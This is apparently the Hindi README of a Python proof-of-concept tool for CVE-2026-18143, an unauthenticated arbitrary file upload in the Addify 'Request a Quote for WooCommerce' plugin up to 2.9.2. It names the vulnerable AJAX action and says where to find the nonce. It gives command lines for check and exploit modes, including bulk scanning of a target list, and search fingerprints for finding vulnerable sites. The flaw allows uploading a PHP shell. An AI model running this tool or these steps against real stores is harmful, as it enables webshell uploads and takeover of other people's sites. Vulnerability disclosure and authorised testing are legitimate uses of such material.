
Python PoC जो CVE-2026-18143 की जाँच और शोषण करता है, जो Addify Request a Quote for WooCommerce ≤ 2.9.2 में popup AJAX handler के माध्यम से एक unauthenticated arbitrary file upload है।
Request a Quote for WooCommerce (woocommerce-request-a-quote, Addify / WooCommerce.com) में CVE-2026-18143 के लिए Python 3 PoC।
CVE-2026-18143 — Request a Quote for WooCommerce ≤ 2.9.2 afrfq_submit_quote_via_popup() के माध्यम से अप्रमाणित मनमाना फ़ाइल अपलोड (CWE-434, CVSS 9.8 Critical) की अनुमति देता है। पॉपअप हैंडलर एक्सटेंशन या MIME allowlisting के बिना कच्चे क्लाइंट फ़ाइलनाम का उपयोग करके move_uploaded_file() को कॉल करता है, और वेब-सुलभ अस्थायी RFQ अपलोड निर्देशिका में लिखता है। हमलावर .php शेल अपलोड कर सकते हैं जब कोई सार्वजनिक quote नियम मल्टी-पेज पॉपअप फ़्लो का उपयोग करता है। > 2.9.2 में ठीक किया गया।
PoC पृष्ठ: https://pocbit.org/pocs/cve-2026-18143
कैटलॉग: https://pocbit.org/pocs/
| उत्पाद | Request a Quote for WooCommerce (Addify) |
| प्लगइन पथ | wp-content/plugins/woocommerce-request-a-quote/ |
| प्रभावित | ≤ 2.9.2 |
| AJAX | action=afrfq_submit_quote_via_popup → admin-ajax.php |
| पूर्वापेक्षा | स्टोरफ्रंट पर पॉपअप quote नियम सक्षम |
pip install -r requirements.txt
python poc.py -u https://shop.example --mode check
python poc.py -u https://shop.example --mode check --upload-probe
python poc.py -u https://shop.example --mode exploit --nonce YOUR_NONCE --verify
python poc.py -u https://shop.example --mode exploit --page /shop/ --verify
python poc.py --list targets.example.txt --mode check -j 15
जब quote पॉपअप सक्रिय होता है तो Nonce आमतौर पर शॉप/उत्पाद पृष्ठों पर फ्रंट-एंड JS (afrfq स्थानीयकृत ऑब्जेक्ट) में होता है।
body="/wp-content/plugins/woocommerce-request-a-quote/"
body="afrfq"
केवल अधिकृत परीक्षण। --upload-probe / --mode exploit लक्ष्य पर फ़ाइलें लिखते हैं।